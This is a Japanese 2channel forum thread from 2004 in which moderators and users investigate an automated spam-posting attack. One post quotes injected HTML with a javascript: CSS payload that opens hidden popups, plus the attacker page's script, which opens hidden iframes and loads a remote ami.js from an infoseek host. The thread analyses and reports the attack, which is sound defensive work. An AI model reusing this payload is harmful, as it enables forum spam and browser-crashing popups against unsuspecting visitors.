■ スレ立て・投稿スクリプト対策

このエントリーをはてなブックマークに追加
592 ◆CaKkuEV3EI
著作権・肖像権侵害サイトを晒すスレ その2
http://ex.2ch.net/test/read.cgi/net/1074608630/
エグゼクティブの厨房をヲチするスレ
http://ex.2ch.net/test/read.cgi/net/1072776652/
●●笑える・痛い・個人のページを晒せpart51●●
http://ex.2ch.net/test/read.cgi/net/1074257824/
IDがGoogle検索にヒットしたら神 12件目
http://game4.2ch.net/test/read.cgi/gsaloon/1073746011/ 1000逝きました
ヲチ板が廃止されるまで騙るのって難しいなぁ9
http://ex.2ch.net/test/read.cgi/net/1072221036/

詳細は↓
【規制議論板】質問でも雑談でもOKのスレッド 2
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217-220
593ZubuRock ★:04/01/22 12:55 ID:???
>>592
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
の,ソースとその先のスクリプトを調べてみましたがそれらしい記述が
見つかりませんです…(偽装してあると私にはわかりません)
どなたかソースを見つけた方はいますか?
この中で一番古い日付は
http://ex.2ch.net/test/read.cgi/net/1072776652/795
795 :795 :04/01/21 22:42 ID:5/NdN2ae
なので,あながち別物とも考えづらいけど。
スクリプトに詳しい方がおりましたら調査していただけると…
594動け動けウゴウゴ2ちゃんねる:04/01/22 13:52 ID:JSATyUF2
>>593
ttp://www.game-can.com/ffa/index.html
> 4階 5連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:374413479/Max:465998585<br>
> 3階 4連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:465385436/Max:465385436<br>
> 2階 16連勝、つくよみの<a href=ttp://www.cronous.jp/index.asp%00" style='background:url(javascript:i=5;while(i)
{i--;open("ttp://amiiy.hp.infoseek.co.jp/?"+i?x2c"_blank"?x2c"left=9999?x2cscreenX=9999")})' name=" TARGET=_blank>cronous</a>HP:462467736/Max:462467736<br>

で跳んだ先のamiiy.hp.infoseek.co.jpにこんなもの↓が。私も詳しくないので詳しい方解析頼みます。。。


<BODY onload=setTimeout("IframeOpen()",1000)>
<SCRIPT>
if(location.search.match(/0$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/1$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/2$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074704813/l1'}
else if(location.search.match(/3$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072221036/l1'}
else if(location.search.match(/4$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/5$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/6$/)){thread='http://aa2.2ch.net/test/read.cgi/accuse/1074403046/l1'}
else if(location.search.match(/7$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074257824/l1'}
else if(location.search.match(/8$/)){thread='http://ex.2ch.net/test/read.cgi/net/1072776652/l1'}
else if(location.search.match(/9$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else if(location.search.match(/10$/)){thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
else{thread='http://ex.2ch.net/test/read.cgi/net/1074608630/l1'}
if(thread.match(/^http:\/\/([^\/]+)\/test\/read\.cgi\/([^\/]+)\//i)){itai='http://'+RegExp.$1+'/'+RegExp.$2+'/i/'}
document.write('\x3cIFRAME\x20ID=myiframe\x20SRC=\x22'+itai+'\x22\x20width=0\x20height=0\x3e\x3c/IFRAME\x3e');
myiframe.open(thread,"_search");
function IframeOpen() {
myiframe.open("javascript:document.write('<body><script\x20src=javascript:document.charset=\x22sjis\x22>
</script\x3e'+document.body.innerHTML+'</body><script\x20src=http://amiiy.hp.infoseek.co.jp/ami.js></script\x3e');","_search");
}
</SCRIPT>
</BODY>
595 ◆CaKkuEV3EI :04/01/22 13:56 ID:KacjdW2D
>>593
スクリプトは詳しくありませんが
該当のところをクリックするとIEがデスクトップ上では開かずにブラクラ状態で繁殖しますタスクバーの表示で確認できます
履歴で呼び出すと検索窓からつついているみたい。履歴のプロパティから↓

飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/?1
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/?1

?1〜?8←以上IEが動作します
そのなかの”js”でさらにループしているみたいですね

飛び先のチェック
http://www.kakiko.com/check/?http://amiiy.hp.infoseek.co.jp/ami.js
ソースチェッカーオンライン
http://so.7walker.net/index.php?site=http://amiiy.hp.infoseek.co.jp/ami.js

hを抜くとかえってあぶないのでチェックサイトへの直リンお許しください。
596動け動けウゴウゴ2ちゃんねる:04/01/22 14:01 ID:/G5FXzx0
>>592
2ちゃんねる撲滅同盟
http://ex.2ch.net/test/read.cgi/net/1074704813/

が更にトラップの対象になった模様
597rafale ★:04/01/22 14:03 ID:???
完全にランダムで文章作って自動で投稿させてますね。
こういうのはあったけど、ソースまで見つかったのは久々な気も。
598 ◆CaKkuEV3EI :04/01/22 14:04 ID:KacjdW2D
>>595
補足
IEだと飛び先のチェックはime.nu経由だと二つ目のhttpが消えているので表示されないようです

599rafale ★:04/01/22 14:08 ID:???
ぷらら(plala)規制中50
http://aa2.2ch.net/test/read.cgi/accuse/1074403046/
もみたい。
ってもしかして対象スレもある程度ランダムで作ってるのかも…
600動け動けウゴウゴ2ちゃんねる:04/01/22 18:00 ID:l3IuY5Ql
またunkoの仕業か?
601 ◆CaKkuEV3EI :04/01/22 19:04 ID:KacjdW2D
>>592-599
該当サイトは現在403になりました。
インフォシークにブラクラとして通報できたんですがサイト案内判りづらかった。。。
ついさっきまで探してました。
ソースチェッカーオンラインはデータログを元に表示しているようなのでまだそのままです。
602ZubuRock ★:04/01/22 19:51 ID:???
遅くなりました。

>>594-601
乙でしたー。ありがとうございます。
その先までは見てませんでした…
スクリプト切って見てたので判らなかったし。

ところで,今現在のソースを見るとエンコードが簡体中国なんですが,
やっぱりアチラの方なんですかねえ…
603ZubuRock ★:04/01/22 19:59 ID:???
一応規制議論板にも報告しておきました。
604 ◆CaKkuEV3EI :04/01/22 20:04 ID:KacjdW2D
>>602
IEの仕様(?)っぽいですね。

本来なら
http://qb3.2ch.net/test/read.cgi/sec2chd/1073058813/217
↑のサイトにも通報したかったのですがセキュリティが低すぎて
怖くてできませんでした。((;゚Д゚)ガクガクブルブル

>>603
乙でした。
605動け動けウゴウゴ2ちゃんねる:04/01/22 22:05 ID:wPuN8pX3
ttp://fire.prohosting.com/script9/news.html#unko
unkoは前にもネトヲチ板爆撃してたな
606rafale ★:04/01/23 10:26 ID:???
>>602
どうなんでしょ?漏れが見た時点では変数名がkigoとかだったんで
日本の人だと思うんですが。
なんにしろとまった用で何より。
607ZubuRock ★:04/01/23 18:29 ID:???
>>606
なるほど,言われてみれば確かに。
やはり>>605なんですね…

>とまった用で何より
ですねー
608ZubuRock ★:04/01/23 18:31 ID:???
>>604
すんません,見逃してました。
ありがとうございます。

>↑のサイトにも通報
どうやら最新の記録登録者みたいな感じで出ていたようですし,
サイト側でどうにかできたかぼみょーっすね…

おつでしたー